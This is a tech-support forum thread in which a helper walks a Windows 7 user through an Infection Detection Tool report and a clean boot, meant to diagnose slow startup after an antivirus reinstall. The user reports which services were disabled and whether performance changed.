  • Upon completion, and when prompted that the rescan is complete, click Generate Text Friendly Report for Forums.
  • Copy the contents of the report and paste in your next reply.

Adam:

 

No issues with the Trend uninstall/install.  Updated OK, didn't detect anything on a full system scan, and fires up automatically on reboot.  It seems to run a little lighter now.  So while there is a lot of disk activity for about 5-10 minutes on startup, once that stops the computer is quite responsive.  Possibly lousy page file settings or still too many useless services starting?

 

ID tool results below:

 

Infection Detection Tool v1.6 - Nathan Scott
--------------------------------------------
Date/Time: 11/20/2014 10:03:02 PM
Operating System: Windows 7
Service Pack: Service Pack 1
Version Number: 6.1
Product Type: Workstation
--------------------------------------------
[Detected Flags]
 


Hi Chris, 

 

Whilst I look into your encrypted file, we can address your high startup disc activity. 
Please do the following, and let me know if you notice a difference. 

 

Clean Boot

  • Press the Windows Key + r on your keyboard at the same time. Type msconfig and click OK.
  • If prompted for an administrator password or for confirmation, type the password, or provide confirmation.
  • In the General tab, click Selective Startup.
  • Remove the checkmark next to Load startup items.
  • Click the Services tab.
  • Place a checkmark next to Hide all Microsoft services.
  • Click Disable all, followed by OK.
  • When prompted, click Restart and boot normally into Windows.
  • Check your computer startup performance.

OK...  So for documentation purposes, this is what got disabled:

 

Services

Adobe acrobat updater

Adobe flash updater

Trend micro solution platform

Seagate service

Shadow explorer service

 

Startup

THXAudio

Creative Updreg

Seagate freeagent

Adobe reader and acrobat manager

MFManager

 

Aren't some of those worthwhile, like the auto updaters, antivirus, and Seagate backup?


OK, so after the login screen, there is still about 10 minutes of disk activity.  Trend seems to have turned its service back on, but I am still thinking I need Seagate and the two Adobes on as well.  Boot time and performance really don't seem all that different, although svchost went from 214,100k before changing the startup settings, now to 167,100k.


This topic is now closed to further replies.